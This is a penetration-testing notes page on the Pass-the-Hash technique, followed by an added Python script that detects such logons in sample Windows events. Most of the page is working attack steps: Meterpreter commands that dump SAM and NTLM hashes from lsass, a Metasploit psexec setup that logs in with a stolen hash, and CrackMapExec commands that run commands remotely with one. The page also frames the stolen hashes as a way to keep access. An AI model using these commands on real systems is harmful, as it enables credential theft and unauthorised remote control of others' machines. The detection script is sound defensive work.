# Pass-the-Hash
Pass-the-Hash is an exploitation technique in which captured NTLM hashes (or clear-text passwords) are used to authenticate to the target as the legitimate user. The hash itself is presented to the authentication protocol, so the password never has to be cracked.

Multiple tools can be used:

- Metasploit PsExec module
- Crackmapexec

Because a captured hash stays valid until the account's password is changed, this technique also serves as a form of persistence: access survives even if the initial entry vulnerability is patched.
## Exploitation

### Metasploit

First, an exploit is needed to obtain initial access to the system. Once a Meterpreter session is open, run the following commands:
```
# Migrate into the lsass process (requires SYSTEM privileges)
pgrep lsass
migrate LSASS_PID

# Dump hashes from the SAM
hashdump

# NTLM hashes can also be retrieved with Kiwi
load kiwi
# Get NTLM hashes using Kiwi
lsa_dump_sam

# Background the Meterpreter session (keystroke, not a command)
Ctrl+Z

# Metasploit PsExec module
use exploit/windows/smb/psexec
# Change default port
set LPORT 4422
set RHOSTS TARGET_IP
set SMBUser TARGET_USER   # Example: Administrator
# SMBPass takes the hash pair in LM_HASH:NT_HASH form, no password needed
set SMBPass LM_HASH:NT_HASH
# Configure the target
set target Native\ upload
exploit
```
### Crackmapexec

```
# Initial connection, authenticating with the NT hash (-H) instead of a password
crackmapexec smb TARGET_IP -u TARGET_USER -H "NTLM_HASH"

# Execute commands on the target
crackmapexec smb TARGET_IP -u TARGET_USER -H "NTLM_HASH" -x "COMMAND"
```
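From the defender's side, the logons these commands generate are what a detection should key on. The following is an added example (not part of the original notes): a small Python script over constructed Windows Security events that flags NTLM network logons (4624, logon type 3) to watched accounts or from hosts not expected to use NTLM, and pairs each with a service-installation event (7045) that PsExec-style remote execution leaves behind. The simplified field names, the account and host lists, and the sample events are all assumptions.

```python
"""Flag pass-the-hash style logons in constructed Windows Security events.

A PsExec/CrackMapExec logon with a stolen NT hash appears as a network
logon (4624, LogonType 3) authenticated by the NTLM package instead of
Kerberos; a 7045 (new service installed) shortly afterwards is what
PsExec-style remote execution leaves behind. Field names and the sample
events below are constructed for illustration, not real log data.
"""
from datetime import datetime, timedelta

ADMIN_ACCOUNTS = {"Administrator"}     # assumption: privileged accounts to watch
KNOWN_NTLM_SOURCES = {"10.0.0.5"}      # assumption: hosts allowed to use NTLM

# Constructed sample events (simplified 4624 / 7045 fields).
EVENTS = [
    {"id": 4624, "time": "2024-01-01T10:00:00", "logon_type": 3,
     "auth_pkg": "Kerberos", "user": "Administrator", "src_ip": "10.0.0.5"},
    {"id": 4624, "time": "2024-01-01T10:05:00", "logon_type": 3,
     "auth_pkg": "NTLM", "user": "Administrator", "src_ip": "10.0.0.77"},
    {"id": 7045, "time": "2024-01-01T10:05:02", "service": "XyZqWv"},
    {"id": 4624, "time": "2024-01-01T11:00:00", "logon_type": 3,
     "auth_pkg": "NTLM", "user": "svc_backup", "src_ip": "10.0.0.5"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_pth_candidates(events, window=timedelta(seconds=30)):
    """Return (logon, following 7045 or None) for each NTLM network logon
    that targets a watched account or comes from an unexpected NTLM source."""
    services = [e for e in events if e["id"] == 7045]
    hits = []
    for e in events:
        if e["id"] != 4624 or e["logon_type"] != 3 or e["auth_pkg"] != "NTLM":
            continue  # Kerberos or interactive logons are not the PtH pattern
        if e["user"] not in ADMIN_ACCOUNTS and e["src_ip"] in KNOWN_NTLM_SOURCES:
            continue  # expected NTLM use by a non-privileged account
        follow = next((s for s in services
                       if timedelta(0) <= _ts(s) - _ts(e) <= window), None)
        hits.append((e, follow))
    return hits


if __name__ == "__main__":
    for logon, svc in find_pth_candidates(EVENTS):
        tag = f", service {svc['service']!r} installed right after" if svc else ""
        print(f"{logon['time']} NTLM network logon {logon['user']}@{logon['src_ip']}{tag}")
```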